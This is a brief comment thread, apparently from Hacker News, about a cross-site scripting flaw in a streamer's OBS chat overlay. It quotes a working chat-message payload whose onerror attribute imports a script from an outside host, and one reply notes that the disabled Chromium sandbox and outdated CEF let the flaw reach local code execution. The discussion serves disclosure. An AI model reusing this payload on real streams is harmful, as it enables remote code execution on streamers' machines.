Remix.run Logo
▲ verteu 2 hours ago

tldr: XSS on OBS via the message

  !image http://toto.jpg/x'onerror=import('https://ha10.scrt.ch:8080/poc-module.js');a='a
▲Macha 2 hours ago | parent [-]

The interesting part IMO is less the XSS on the streamer's overlay, but the fact that it could escape the browser source web page into local code execution (via a combination of OBS disabling the chromium sandbox, and using an outdated CEF version)